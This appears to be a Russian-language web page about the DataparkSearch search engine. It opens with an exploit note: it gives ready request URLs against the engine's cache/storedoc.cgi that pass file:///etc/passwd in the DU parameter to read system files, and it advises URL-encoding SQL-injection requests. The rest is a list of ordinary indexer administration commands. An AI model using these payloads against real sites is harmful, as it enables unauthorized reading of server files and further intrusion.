DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include

DataparkSearch
DataPark Search Engine

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd


в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146


/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd



Blind SQL Injection
Читать дальше

DataparkSearch Engine Команды управления

Если http-сервер поддерживает любой из методов кодирования gzip, deflate, identity, compress он шлёт ответ, закодированый этим методом.
Использование сжатия http-запросов позволяет уменьшить трафик в два и более раз.
./configure --with-zlib

Запустите indexer для индексирвоания ваших данных и записи информации об URL:
/usr/local/dpsearch/sbin/indexer -W

переиндекировать все документы, независимо от того, устарели они или нет, используйте ключ -a
/usr/local/dpsearch/sbin/indexer -a

Это может быть полезным, например, когда меняются правила Allow/Disallow в indexer.conf и необходимо добавить новые страницы, которые раньше были запрещены к обработке.
Ключ indexerа -m заставляет разбирать заново каждый документ, независимо от того, измён он или нет.
/usr/local/dpsearch/sbin/indexer -m

Управление подсекциями
-t соответсвует ограничению по тэгу
-g соответсвует ограничению по категории
-u — ограничение по части URL (поддерживаются шаблоны SQL LIKE с символами % и _)
-s — ограничение по HTTP статусу документа
-y — ограничения по Content-Type

Как очистить базу данных
/usr/local/dpsearch/sbin/indexer -C — Вы можете также удалить тольеко часть базы, используя ключи указания подсекций -t,-g,-u,-s,-y.

Пример:
в Disallow используется * звездочка
тут используется % процент
удаление по URL
./indexer -C -u http://site.ru/tag.html%
./indexer -C -u  http://site.ru/search/tag/%
удаление по коду ./indexer -S

./indexer -C -s 301
./indexer -C -s 302
./indexer -C -s 303
./indexer -C -s 404
./indexer -C -s 415
./indexer -C -s 2200

Создание SQL-таблиц
/usr/local/dpsearch/sbin/indexer -Ecreate

Удаление SQL-таблиц
/usr/local/dpsearch/sbin/indexer -Edrop

Статистика базы данных

/usr/local/dpsearch/sbin/indexer -S

Проверка ссылок
Например, indexer -I -s 404 покажет адреса всех ненайденных ('Not found') документов вместе с адресами страницами, содержащими ссылки на эти документы.
/usr/local/dpsearch/sbin/indexer -I